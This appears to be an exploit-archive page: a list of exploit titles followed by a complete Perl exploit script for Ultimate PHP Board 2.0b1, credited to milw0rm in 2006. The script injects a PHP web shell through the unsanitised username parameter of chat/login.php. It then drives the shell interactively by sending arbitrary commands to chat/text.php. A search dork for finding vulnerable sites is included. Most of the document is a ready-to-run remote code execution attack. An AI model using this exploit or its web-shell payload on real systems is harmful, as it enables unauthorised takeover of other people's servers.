477bcbdcc0
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
94 lines
3.5 KiB
Perl
Executable file
94 lines
3.5 KiB
Perl
Executable file
#!/usr/bin/perl
|
|
# +-------------------------------------------------------------------------------------------
|
|
# + Ultimate PHP Board <= 2.0b1 (chat/login.php) Remote Code Execution Vulnerability
|
|
# +-------------------------------------------------------------------------------------------
|
|
# + Affected Software .: Ultimate PHP Board (myUPB) <= 2.0b1
|
|
# + Vendor ............: http://www.myupb.com/
|
|
# + Download ..........: http://fileserv.myupb.com/upb2.0B1.zip
|
|
# + Description .......: "Ultimate PHP Board is a free discussion forum that can be used as a free alternative to UBB or vBulletin"
|
|
# + Dork ..............: "Powered by UPB"
|
|
# + Class .............: Remote Code Execution
|
|
# + Risk ..............: High (Remote Code Execution)
|
|
# + Found By ..........: nuffsaid <nuffsaid[at]newbslove.us>
|
|
# +-------------------------------------------------------------------------------------------
|
|
# + Details:
|
|
# + Ultimate PHP Board chat/login.php does not sanatize the $username ($_GET["username"])
|
|
# + variable before writing it to chat/text.php on line 28, arbitrary php code can be written
|
|
# + then executed by visiting chat/text.php.
|
|
# +
|
|
# + Vulnerable Code:
|
|
# + chat/login.php, line(s) 23-28:
|
|
# + -> 23: $filename = "text.php";
|
|
# + -> 24: $fileAr= file($filename);
|
|
# + -> 25: exec("cat /dev/null > '$filename'");
|
|
# + -> 26: $fd = fopen( $filename, "a+" );
|
|
# + -> 27: $filemessage = "<font size='$font_s' face='$font_face' color='$font_color_main'><b>$username entered at $date</b></font><br>\n";
|
|
# + -> 28: fputs($fd,$filemessage);
|
|
# +
|
|
# + Proof of Concept:
|
|
# + http://[target]/[path]/chat/login.php?option=chat&username=[code]
|
|
# + http://[target]/[path]/chat/text.php
|
|
# +-------------------------------------------------------------------------------------------
|
|
|
|
use Getopt::Long;
|
|
use URI::Escape;
|
|
use IO::Socket;
|
|
|
|
$code = "<?php if (isset(\$_GET[cmd])) passthru(\$_GET[cmd]); die; ?>";
|
|
|
|
main();
|
|
|
|
sub usage
|
|
{
|
|
print "\nUltimate PHP Board <= 2.0b1 Remote Code Execution Exploit\n";
|
|
print "nuffsaid <nuffsaid[at]newbslove.us>\n";
|
|
print "-h, --host\ttarget host\t(example.com)\n";
|
|
print "-d, --dir\tinstall dir\t(/forum)\n";
|
|
exit;
|
|
}
|
|
|
|
sub main
|
|
{
|
|
GetOptions ('h|host=s' => \$host,'d|dir=s' => \$dir);
|
|
usage() unless $host;
|
|
$dir = "/forum" unless $dir;
|
|
$sock = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$host",PeerPort=>"80")
|
|
or die "\nconnect() failed.\n";
|
|
|
|
print "\nconnected to ".$host.", sending data.\n";
|
|
$sendurl = uri_escape($code);
|
|
print $sock "GET ".$dir."/chat/login.php?option=chat&username=".$sendurl." HTTP/1.1\n";
|
|
print $sock "Host: ".$host."\n";
|
|
print $sock "Accept: */*\n";
|
|
print $sock "Connection: close\n\n";
|
|
print "\n";
|
|
print "attempted to create php shell, server response:\n\n";
|
|
while($recvd = <$sock>)
|
|
{
|
|
print " ".$recvd."";
|
|
}
|
|
|
|
while($cmd !~ "~quit")
|
|
{
|
|
print "\n\n-> ";
|
|
$cmd = <STDIN>;
|
|
if ($cmd !~ "~quit")
|
|
{
|
|
$sock = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$host",PeerPort=>"80")
|
|
or die "connect() failed.\n";
|
|
$sendurl = uri_escape($cmd);
|
|
print $sock "GET ".$dir."/chat/text.php?cmd=".$sendurl." HTTP/1.1\n";
|
|
print $sock "Host: ".$host."\n";
|
|
print $sock "Accept: */*\n";
|
|
print $sock "Connection: close\n\n";
|
|
print "\n";
|
|
while($recvd = <$sock>)
|
|
{
|
|
print $recvd;
|
|
}
|
|
}
|
|
}
|
|
exit;
|
|
}
|
|
|
|
# milw0rm.com [2006-12-24]
|